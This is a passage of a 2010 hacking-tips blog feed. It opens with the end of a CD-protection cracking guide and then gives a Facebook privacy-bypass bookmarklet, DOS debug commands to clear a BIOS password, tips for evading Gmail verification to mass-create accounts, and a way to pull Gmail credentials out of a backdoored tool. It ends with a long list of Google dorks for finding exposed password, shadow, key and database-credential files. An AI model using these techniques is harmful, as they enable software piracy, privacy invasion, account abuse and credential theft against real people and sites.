and then test it again. You might be needed to do it several&lt;br /&gt;number of times, until you are getting no error message and the game runs!&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Chapter VII&lt;/span&gt;: Quick order list.&lt;br /&gt;- Start without Cd then look at the error message and write it down.&lt;br /&gt;- Search the msg in Win32Dasm referance and copy nmber w/out the H at the end!.&lt;br /&gt;- Open Hiew, F4 to Decode, F5 to seach the line, and change the command – 90 for&lt;br /&gt;every 1 byte.&lt;br /&gt;- F10 to save and then get out, don’t forget to test!&lt;br /&gt;Good luck&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-7670710152135826668?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/7670710152135826668/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-crack-cd-protections.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7670710152135826668'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/7670710152135826668'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-crack-cd-protections.html' title='HOW TO CRACK CD PROTECTIONS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-894682940687718240</id><published>2010-08-24T11:53:00.000-07:00</published><updated>2010-08-24T11:54:38.472-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hidden'/><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='picture'/><title type='text'>HOW TO SEE FACEBOOK HIDDEN PICTURES</title><content type='html'>1. Go to the Profile-page of the Person.&lt;br /&gt;2. Clear your Address line&lt;br /&gt;3. Copy this into:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()&lt;br /&gt;&lt;br /&gt;4. Now you can easily see Pictures of s.b. you don't even know.&lt;br /&gt;&lt;br /&gt;Best regards and Have fun!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-894682940687718240?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/894682940687718240/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-see-facebook-hidden-pictures.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/894682940687718240'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/894682940687718240'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-see-facebook-hidden-pictures.html' title='HOW TO SEE FACEBOOK HIDDEN PICTURES'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1795627844574105732</id><published>2010-08-23T08:37:00.001-07:00</published><updated>2010-08-23T08:38:35.910-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='bios'/><title type='text'>HOW TO CRACK BIOS PASSWORD</title><content type='html'>STEPS TO BE FOLLOW&lt;br /&gt;&lt;br /&gt;1) Boot up windows.&lt;br /&gt;2) go to dos-prompt or go to command prompt directly from the windows start up menu.&lt;br /&gt;&lt;br /&gt;3) type the command at the prompt: “debug”&lt;br /&gt;4) type the following lines now exactly as given…….&lt;br /&gt;o 70 10&lt;br /&gt;o 71 20&lt;br /&gt;quit&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;4) exit from the dos prompt and restart the machine&lt;br /&gt;&lt;br /&gt;password protection gone!!!!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1795627844574105732?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1795627844574105732/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/steps-to-be-follow-1-boot-up-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1795627844574105732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1795627844574105732'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/steps-to-be-follow-1-boot-up-windows.html' title='HOW TO CRACK BIOS PASSWORD'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6108002576231122836</id><published>2010-08-23T08:37:00.000-07:00</published><updated>2010-08-23T08:38:02.865-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='bios'/><title type='text'>HOW TO CRACK BIOS PASSWORD</title><content type='html'>STEPS TO BE FOLLOW&lt;br /&gt;&lt;br /&gt;1) Boot up windows.&lt;br /&gt;2) go to dos-prompt or go to command prompt directly from the windows start up menu.&lt;br /&gt;&lt;br /&gt;3) type the command at the prompt: “debug”&lt;br /&gt;4) type the following lines now exactly as given…….&lt;br /&gt;o 70 10&lt;br /&gt;o 71 20&lt;br /&gt;quit&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;4) exit from the dos prompt and restart the machine&lt;br /&gt;&lt;br /&gt;password protection gone!!!!!!!!!!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6108002576231122836?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6108002576231122836/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-crack-bios-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6108002576231122836'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6108002576231122836'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-crack-bios-password.html' title='HOW TO CRACK BIOS PASSWORD'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4282247507050607125</id><published>2010-08-22T12:09:00.001-07:00</published><updated>2010-08-22T12:09:59.371-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GMAIL'/><title type='text'>how to make accounts with google without any verification</title><content type='html'>Well, let me tell you how I do it every day without deleting cookies or anything.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can do it with proxy or without proxy. For me it works everytime. So, let's start:&lt;br /&gt;1. Go to gmail.com and hit the sing up page&lt;br /&gt;2. For first and last name I use imdb.com to search names from movies or names of the actors, I combine them, I use a unique name that I believe is not used by anyone. If google will detect that name in their database they will require SMS verification. So go with a unique name, not the popular ones like John Doe or whatever. If you will use the same name on other account they will require SMS verification so stick with a unique one. Everything need to be unique.&lt;br /&gt;3. For login name I don't use numbers and is unique, I will not use that username again. I only use dot in username. If you will create another username similar to that, again, they will detect and they will ask for SMS verification on both accounts.&lt;br /&gt;4. Password. I use a unique password for every account. If you will make a few accounts with the same password they will detect them and they will ask you for SMS verification, so try a unique password. I don't use number in passwords. And I don't use similar passwords.&lt;br /&gt;5. Security Question. Write your own question. Don't use it in other account.&lt;br /&gt;6. I don't use recovery email.&lt;br /&gt;7. The rest it is at your choice.&lt;br /&gt;&lt;br /&gt;I think that at this part you understand that your whole profile must be unique. If you use the same name, password, similar username with other accounts they will always request SMS verification. Be unique and you will not even need a proxy. I do it every day and I can't even remeber when they requested me SMS verification. I know this from my experience.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4282247507050607125?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4282247507050607125/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-make-accounts-with-google.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4282247507050607125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4282247507050607125'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-make-accounts-with-google.html' title='how to make accounts with google without any verification'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-3698995682918462181</id><published>2010-08-21T13:28:00.000-07:00</published><updated>2010-08-21T13:30:46.683-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GMAIL'/><title type='text'>Hack a Gmail Account Easily</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Hack a Gmail Account Easily&lt;/span&gt;. [Guaranteed Hack]&lt;br /&gt;&lt;br /&gt;Credits to Encrypted32 (you can also call me coded32)&lt;br /&gt;&lt;br /&gt;To all Leechers : Give me Credits if you Leech my THREADS and Posts.&lt;br /&gt;&lt;br /&gt;Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Go to Youtube&lt;br /&gt;&lt;br /&gt;-Search "Runescape Hacker" or "Runescape Hacker Download Link"&lt;br /&gt;&lt;br /&gt;-Find the Download Link (They are usually in the comments Section.)&lt;br /&gt;&lt;br /&gt;-Download the Runescape Hacker Tool.&lt;br /&gt;&lt;br /&gt;-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.&lt;br /&gt;&lt;br /&gt;-Download HexWorshop. Google it and you will Find the Link.&lt;br /&gt;&lt;br /&gt;-Install HexWorkshop.&lt;br /&gt;&lt;br /&gt;-Now go to the downloaded RunescapeHacker Phile and Right Click on it !&lt;br /&gt;&lt;br /&gt;-Now You Will see something like "Edit this with HexWorkshop" Click It !&lt;br /&gt;&lt;br /&gt;-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.&lt;br /&gt;&lt;br /&gt;-Just go to the Edit on the Top and Find a Button "Find"&lt;br /&gt;&lt;br /&gt;-When you get 'Find", Click on it !&lt;br /&gt;&lt;br /&gt;-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.&lt;br /&gt;&lt;br /&gt;-Now Enter "Gmail" to the Box and Hit "Find".&lt;br /&gt;&lt;br /&gt;-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.&lt;br /&gt;&lt;br /&gt;-Copy the Highlighted text and Paste it in a Text document (Newly Created).&lt;br /&gt;&lt;br /&gt;-Remove the [.]&gt;DOTs and You will see The Email ID + the Passwd.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-3698995682918462181?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/3698995682918462181/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-gmail-account-easily.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3698995682918462181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3698995682918462181'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-gmail-account-easily.html' title='Hack a Gmail Account Easily'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-3798820107983681070</id><published>2010-08-18T21:17:00.000-07:00</published><updated>2010-08-18T21:18:32.038-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='folder'/><title type='text'>Lock a folder with a password without a software</title><content type='html'>STEPS&lt;br /&gt;&lt;br /&gt;1- make a new folder ( name it as you like )&lt;br /&gt;&lt;br /&gt;2- inside this folder make a ( TXT ) file &amp;amp; copy inside it this (the entire thing)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3- After u copy the Commanding go to line 23 (or try using shortcut- CTRL+F and type password to locate the line) u will find this word : password here (Change it with any password u like.) is :&lt;br /&gt;&lt;br /&gt;eg: if NOT %pass%== narnia1234 goto FAIL&lt;br /&gt;//so ur password here becomes narnia1234 .//&lt;br /&gt;&lt;br /&gt;4- After that go to â€˜save asâ€™ &amp;amp; name this file as "locker.bat "&lt;br /&gt;&lt;br /&gt;5- Now back to the folder &amp;amp; u will find a ( LOCKER ) commanding.&lt;br /&gt;(locker.exe)&lt;br /&gt;&lt;br /&gt;6- Double Click on it &amp;amp; u will find a new folder (Private )&lt;br /&gt;&lt;br /&gt;7- Ok ,, now copy what u want in this "private Folder" &amp;amp; after that come out of the folder, and Double click on locker again. It will open and ask if you want to lock your folder? Y/N ?&lt;br /&gt;&lt;br /&gt;8- Type Y. your private folder will dissapear.&lt;br /&gt;&lt;br /&gt;9- If you want to UNLOCK your folder ,go to (locker) &amp;amp; type your pass and you will see your private folder.&lt;br /&gt;&lt;br /&gt;it not only hides the fodler, but incase, u unhide all files... and try opening it without entering password, it'l take u to the control panel...&lt;br /&gt;&lt;br /&gt;Also, if u want to store files on your Pen-Drive, u can use this script. No Software Required&lt;br /&gt;&lt;br /&gt;Incase u delete your Locker file (just in case), then u can make a new one (but with the same password) and open it from that.&lt;br /&gt;&lt;br /&gt;Alternatively, u can keep this locker file somewhere else, and when u want to open ur folder, only then bring it back to that place ..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-3798820107983681070?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/3798820107983681070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/lock-folder-with-password-without.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3798820107983681070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/3798820107983681070'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/lock-folder-with-password-without.html' title='Lock a folder with a password without a software'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2380683585231060067</id><published>2010-08-18T12:04:00.000-07:00</published><updated>2010-08-18T12:05:36.689-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><title type='text'>Google dorks to find vuln. sites !</title><content type='html'>&lt;span style="color: rgb(51, 102, 255);"&gt;admin account info” filetype:log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;!Host=*.* intext:enc_UserPassword=* ext:pcf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“AutoCreate=TRUE password=*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“http://*:*@www” domainname&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“index of/” “ws_ftp.ini” “parent directory”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“liveice configuration file” ext:cfg -site:sourceforge.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“parent directory” +proftpdpasswd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Duclassified” -site:duware.com “DUware All Rights reserved”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;duclassmate” -site:duware.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Dudirectory” -site:duware.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;dudownload” -site:duware.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Elite Forum Version *.*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Link Department”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“sets mode: +k”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“your password is” filetype:log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;DUpaypal” -site:duware.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl: admin mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;auth_user_file.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;config.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;eggdrop filetype:user user&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;enable password | secret “current configuration” -intext:the&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;etc (index.of)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:inc “pwd=” “UID=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ini eudora.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:ini Version=4.0.0.4 password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:passwd -intext:the -sample -example&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:txt inurl:unattend.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:yml database inurl:config&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:bak createobject sa&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:bak inurl:”htaccess|passwd|shadow|htusers”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cfg mrtg “target&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cfm “cfapplication name” password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:conf oekakibbs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:conf slapd.conf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:config config intext:appSettings “User ID”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:dat “password.dat”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:dat inurl:Sites.dat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:dat wand.dat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:inc dbconn&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:inc intext:mysql_connect&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:inc mysql_connect OR mysql_pconnect&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:inf sysprep&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ini inurl:”serv-u.ini”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ini inurl:flashFXP.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ini ServUDaemon&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ini wcx_ftp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ini ws_ftp pwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:ldb admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log “See `ipsec –copyright”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log inurl:”password.log”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:mdb inurl:users.mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:mdb wwforum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:netrc password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pass pass intext:userid&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pem intext:private&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:properties inurl:db intext:password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pwd service&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pwl pwl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:reg reg +intext:â? WINVNC3â?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:sql “insert into” (pass|passwd|password)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:sql (“values * MD5″ | “values * password” | “values * encrypt”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:sql +”IDENTIFIED BY” -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:sql password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:url +inurl:”ftp://” +inurl:”;@”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:xls username password email&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;htpasswd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;htpasswd / htgroup&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;htpasswd / htpasswd.bak&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”enable password 7″&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”enable secret 5 $”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”EZGuestbook”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Web Wiz Journal”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index of” intext:connect.inc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”index of” intext:globals.inc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Index of” passwords modified&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Index of” sc_serv.conf sc_serv content&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of administrators.pwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Index.of etc shadow&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:rapidshare intext:login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”calendars?ri?t/users.txt”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”GRC.DAT” intext:”password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”Sites.dat”+”PASS=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” 